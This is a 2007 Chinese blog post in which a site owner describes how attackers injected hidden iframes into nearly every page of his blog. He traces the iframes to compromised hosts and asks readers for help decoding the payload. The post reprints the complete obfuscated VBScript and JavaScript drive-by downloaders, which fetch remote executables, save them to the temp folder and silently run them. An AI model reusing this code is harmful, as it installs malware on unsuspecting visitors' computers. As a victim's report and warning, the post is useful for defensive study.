DoNews.com
当前位置: IT写作社区周晶波互联网业
我的博客被挂满了木马
周晶波 | 互联网业 | 出处:原创-IT| 2007年03月29日 17:05 | 阅读
        



















我的独立空间博客[www.suconsulting.com/blog]前几天遭卑鄙小人植入网页木马,现已修复到无毒状态[除数据库外删除了全部文件并重新上传了原始文件],现将情况报告如下,希望有高手帮助破解最后一部分的最终源代码,将下马的小人揪出来,如能查清来源,我将向有关部门报案(我留存了木马网页),也算提供一个网络犯罪的案例。

特别提醒:以下文中提到的相关网址都挂有木马病毒,请确认自己对此有所了解并具备防范手段才能访问。否则笔者不承担你因此而遭受的任何损害。

〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓

应该时间不长,因为我是这两天在浏览自己的博客[www.suconsulting.com/blog]时,发现maxtho浏览器的状态栏飞快地闪动着一堆网址。刚开始以为是电脑有流氓插件,用软件扫了几遍也没踪影,才忽然想到木马是被挂在我的网页上。

------我对该网站的虚拟空间服务商[福建中资源www.zzy.cn]也非常有意见:网页上挂满了木马,服务商居然一点反应都没有,也没有木马病毒监测功能,难道还要网站主整天自己负责网站安全不成,见鬼!

一查之下,恶心加痛恨,这个种木马的卑鄙小人几乎在我网页上的每一页都挂满了木马,包括和基督教相关的荒漠甘泉html页面的每一页。这个小人不但卑鄙,而且恶心异常。我今天干脆花点时间弄成截图,让一些没有网站或者没做过网页的人看看这些卑鄙小人的勾当,当做为网页挂马这种网络犯罪行为留下个样本。

第一层次:页面分析

图1:恶心吧?这个衰人在同一张页面将他的木马网页嵌了六遍!做流氓怎么能绝到这种地步?
[注:IFRAM标记中的网页地址http:/ww.haogs.cn/html里面的首页就是挂有木马的网页]

UPLOADS/200703/29_165427_3.JPG



图2:几乎在每一个页面的最后,都嵌了他的木马框架页[IFRAM标记中]。

UPLOADS/200703/29_165456_4.JPG



图3:这个haogs网站不一定就是这个卑鄙小人的,更有可能是被这卑鄙小人入侵后用做了挂木马网页的肉鸡,这卑鄙小人再将放在haogs网站里
面含有木马的网页地址挂到其他网站去。

UPLOADS/200703/29_165502_5.JPG



图4:我这样一个博客程序,总共才203个文档,居然就被挂了178处,这卑鄙小人应该是把文件全部当下来,用DW软件一次性添加了。添加这么多,也太无耻得肆无忌惮了。

UPLOADS/200703/29_165510_6.JPG



图5:除了上面的这个网址,还有这个网址也是挂马的地方。

UPLOADS/200703/29_165515_8.JPG



〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓

第二层次:表面来源追踪

查得haogs网页的信息

UPLOADS/200703/29_165521_92.JPG



根据上面邮件查到qq号码:

UPLOADS/200703/29_165527_10.JPG



 

UPLOADS/200703/29_165532_11.JPG



根据上面邮件查得地址及电话号码:

UPLOADS/200703/29_165541_13.JPG



这个挂木马的还有统计代码:

UPLOADS/200703/29_165546_14.JPG



第三层次:最终来源追踪

我在上面已经说了,上面第二层次的来源只是表面来源,这个haogs网站可能也是被入侵了,同样ww.cg100.com(提醒:如非技术或犯罪研究请切勿访问)也可能是被入侵者在上面挂了马还不知道。

真实的木马代码要分析挂的网页上的源代码。源代码有两个地方,一个是haogs.cn/html这个文件夹里的首页,另一个就是ww.cg100.com/knowledge/ma.htm这个网页里。

用下载软件将其下载下来,用记事本将其打开。

1,在ma.html里的源代码如下(对加密过的VB代码再用函数以累加的方式得到最后代码,加大了解密难度):

<script language="VBScript">
S="6F6E206572726F7220726573756D65206E6578740D0A6375726C3D22687474703A2F2F616E69752E3531616E64612E636F6D2F77756C69616F2E657865220D0A666E616D65313D2277756C69616F2E657865220D0A536574206466203D20646F63756D65"
S=S+"6E742E637265617465456C656D656E7428226F626A65637422290D0A64662E7365744174747269627574652022636C6173736964222C2022636C7369643A42443936433535362D363541332D313144302D393833412D303043303446433239453336220D"
S=S+"0A7374723D224D6963726F736F66742E584D4C48545450220D0A5365742078203D2064662E4372656174654F626A656374287374722C2222290D0A43313D2241646F220D0A43323D2264622E220D0A43333D22737472220D0A43343D2265616D220D0A73"
S=S+"7472313D43312643322643332643340D0A737472353D737472310D0A7365742053203D2064662E6372656174656F626A65637428737472352C2222290D0A532E74797065203D20310D0A737472363D22474554220D0A782E4F70656E20737472362C2063"
S=S+"75726C2C2046616C73650D0A782E53656E640D0A73313D22536372697074220D0A73323D22696E672E220D0A73333D2246696C65220D0A73343D2253797374656D4F626A656374220D0A73303D73312B73322B73332B73340D0A7365742046203D206466"
S=S+"2E6372656174656F626A6563742873302C2222290D0A73657420746D70203D20462E4765745370656369616C466F6C6465722832290D0A666E616D65313D20462E4275696C645061746828746D702C666E616D6531290D0A532E6F70656E0D0A532E7772"
S=S+"69746520782E726573706F6E7365426F64790D0A532E73617665746F66696C6520666E616D65312C320D0A532E636C6F73650D0A696620462E46696C6545786973747328666E616D6531293D74727565207468656E0D0A202020207365742051203D2064"
S=S+"662E6372656174656F626A65637428225368656C6C2E4170706C69636174696F6E222C2222290D0A20202020512E5368656C6C4578656375746520666E616D65312C22222C22222C226F70656E222C300D0A656E642069660D0A"
D=""
DO WHILE LEN(S)>1
k="&H"+LEFT(S,2)
p=CLng(k)
m=chr(p)
D=D&m
S=MID(S,3)
LOOP
EXECUTE D
</script>

2,在ww.haogs.cn/html这个文件夹的首页里的代码如下,第一行是挂的另一个木马网页,第二行是统计代码(提醒:如非技术或犯罪研究请切勿访问,为避免误点我将haogs网址同样去掉了"/w",面的网址我去掉了"p:/"):

<iframe src="http:/ww.haogs.cn/mm/mm.htm" width=0 height=0></iframe>
<script language="javascript" src="htt/count9.51yes.com/click.aspx?id=95169479&logo=1"></script>

3.mm.htm里的源代码如下(从第二行来看,这个卑鄙小人可能企图用网页木马来盗取QQ号码并发到他的邮箱里。提醒:如非技术或犯罪研究请切勿访问,下面挂qq.exe的地址我去掉了"/w"免得人误点,下):

<script>
FanChenZi="http:/ww.haogs.cn/mm/qq.exe"
t="60,83,99,114,105,112,116,32,76,97,110,103,117,97,103,101,61,34,86,66,83,99,114,105,112,116,34,62,13,10,79,110,32,69,114,114,111,114,32,82,101,115,117,109,101,32,78,101,120,116,13,10,102,108,106,103,100,102,108,106,103,100,102,61,106,100,102,104,103,102,100,103,13,10,102,100,103,100,102,103,100,102,103,61,100,102,103,100,102,103,13,10,100,102,103,100,102,103,100,102,103,100,102,103,61,100,102,103,102,104,13,10,102,100,103,103,102,61,102,100,103,100,103,100,102,103,100,102,103,13,10,100,102,103,102,100,103,102,100,103,61,100,102,103,100,102,103,100,102,13,10,100,102,103,100,102,103,100,102,103,61,100,102,103,100,102,103,100,102,103,13,10,81,105,97,110,74,117,70,97,110,61,34,111,34,38,34,98,34,38,34,106,34,13,10,81,105,97,110,74,117,67,104,101,110,61,34,101,34,38,34,99,34,38,34,116,34,13,10,81,105,97,110,74,117,70,97,110,99,104,101,110,61,81,105,97,110,74,117,70,97,110,38,81,105,97,110,74,117,67,104,101,110,13,10,81,105,97,110,70,97,110,61,34,99,34,38,34,108,34,13,10,81,105,97,110,67,104,101,110,61,34,97,34,38,34,115,34,38,34,115,34,13,10,81,105,97,110,90,105,61,34,105,34,38,34,100,34,13,10,81,105,97,110,70,97,110,99,104,101,110,90,105,61,81,105,97,110,70,97,110,38,81,105,97,110,67,104,101,110,38,81,105,97,110,90,105,13,10,81,105,97,110,74,117,70,61,34,99,34,38,34,108,34,38,34,115,34,13,10,81,105,97,110,74,117,70,97,61,34,105,34,38,34,100,34,38,34,58,34,13,10,81,105,97,110,70,97,110,61,34,66,34,38,34,68,34,38,34,57,34,38,34,54,67,34,38,34,53,53,34,38,34,54,34,38,34,45,34,13,10,81,105,97,110,67,101,110,61,34,54,34,38,34,53,34,38,34,65,34,38,34,51,34,38,34,45,34,38,34,49,34,38,34,49,34,38,34,68,34,38,34,48,34,13,10,81,105,97,110,67,61,34,45,57,34,38,34,56,34,38,34,51,65,34,38,34,45,34,13,10,81,105,97,110,74,117,90,61,34,48,34,38,34,48,34,38,34,67,34,38,34,48,34,38,34,52,34,13,10,81,105,97,110,74,117,105,61,34,70,34,38,34,67,34,38,34,50,34,38,34,57,34,38,34,69,34,38,34,51,34,38,34,54,34,13,10,81,105,97,110,74,117,99,104,101,110,90,105,61,81,105,97,110,74,117,70,38,81,105,97,110,74,117,70,97,38,81,105,97,110,70,97,110,38,81,105,97,110,67,101,110,38,81,105,97,110,67,38,81,105,97,110,74,117,90,38,81,105,97,110,74,117,105,13,10,81,105,97,110,70,61,34,77,34,38,34,105,34,38,34,99,34,13,10,81,105,97,110,70,97,61,34,114,34,38,34,111,34,38,34,115,34,13,10,81,105,97,110,70,110,61,34,111,34,38,34,102,34,38,34,116,34,38,34,46,34,13,10,81,105,97,110,67,110,61,34,88,34,38,34,77,34,38,34,76,34,13,10,81,105,97,110,78,61,34,72,34,38,34,84,34,13,10,81,105,97,110,90,61,34,84,34,38,34,80,34,13,10,81,105,97,110,74,117,90,105,61,81,105,97,110,70,38,81,105,97,110,70,97,38,81,105,97,110,70,110,38,81,105,97,110,67,110,38,81,105,97,110,78,38,81,105,97,110,90,13,10,81,105,70,61,34,83,34,38,34,99,34,38,34,114,34,38,34,105,34,13,10,81,105,70,97,61,34,112,34,38,34,116,105,34,38,34,110,34,38,34,103,34,38,34,46,34,13,10,81,105,70,110,61,34,70,34,38,34,105,34,38,34,108,34,38,34,101,34,38,34,83,34,13,10,81,105,67,110,61,34,121,34,38,34,115,34,38,34,116,34,38,34,101,34,13,10,81,105,78,61,34,109,34,38,34,79,34,38,34,98,34,13,10,81,105,90,61,34,106,34,38,34,101,34,38,34,99,34,38,34,116,34,13,10,81,105,90,105,61,81,105,70,38,81,105,70,97,38,81,105,67,110,38,81,105,67,110,38,81,105,78,38,81,105,90"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
Set Zi = document.createElement(QianJuFanchen)
Zi.SetAttribute QianFanchenZi, QianJuchenZi
Happy=QianJuZi
Set ZhongHua = Zi.CreateObject(Happy,"")
ZhongHua.Open "GE"&"T", FanChenZi, False
ZhongHua.Send
ChenziUser="C"&"he"&"n"&"zi.exe"
QianjuUser="C"&"he"&"n"&"zi.vbs"
Set HUA = Zi.createobject(QiZi,"")
Set Wuer = HUA.GetSpecialFolder(2)
ChenziUser=HUA.BuildPath(Wuer,ChenziUser)
QianjuUser=HUA.BuildPath(Wuer,QianjuUser)
Zhong="A"&"d"
Hua="o"&"d"
Wang="b"&"."&"s"&"t"
luo="r"&"e"&"a"&"m"
ZhongHuaWangLuo=Zhong&Hua&Wang&luo
Set Chenzi = Zi.createobject(ZhongHuaWangLuo,"")
Chenzi.type=1
Chenzi.Open
Chenzi.Write ZhongHua.ResponseBody
Chenzi.Savetofile ChenziUser,2
Chenzi.Close
Chenzi.Type=2
Chenzi.Open
Chenzi.WriteText "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&ChenziUser&""")"&vbCrLf&"Set Shell = Nothing"
Chenzi.Savetofile QianjuUser,2
Chenzi.Close
Xin="S"&"h"&"e"
Nian="l"&"l"&"."
Kuai="A"&"p"&"p"
Le="l"&"i"
QianJuZhuDaJiaXinNianKuaiLe=Xin&Nian&Kuai&Le
XinNianKuaiLe=QianJuZhuDaJiaXinNianKuaiLe
Set Zhong = Zi.createobject(XinNianKuaiLe&"cation","")
Zhong.ShellExecute QianjuUser,"","","Open",0
</Script>

第三层次:代码解密

这部分我还没搞出来,希望有人懂得些解密的提供些帮助,我倒想看看这卑鄙小人倒底是谁,是哪个公司。提供个辅助信息,就是挂马后浏览器状态栏快速闪动的网址除了上面的haogs,还有一个是www.16tan.com这个卑鄙的弹窗制造兼贩卖公司。

补充部分:损失

由于对这卑鄙小人的极端厌恶,改程序的过程中心情烦燥[这个lbs博客程序被我反复折腾早已经面目全非,全新安装连数据库都没法用],在下载了blog数据库后,将网站所有文件一把删光了,忘记了还有upload文件夹里的图片,结果丢失了这两年来的[原创影像]栏目的所有图片,有很多图片是没有存根的。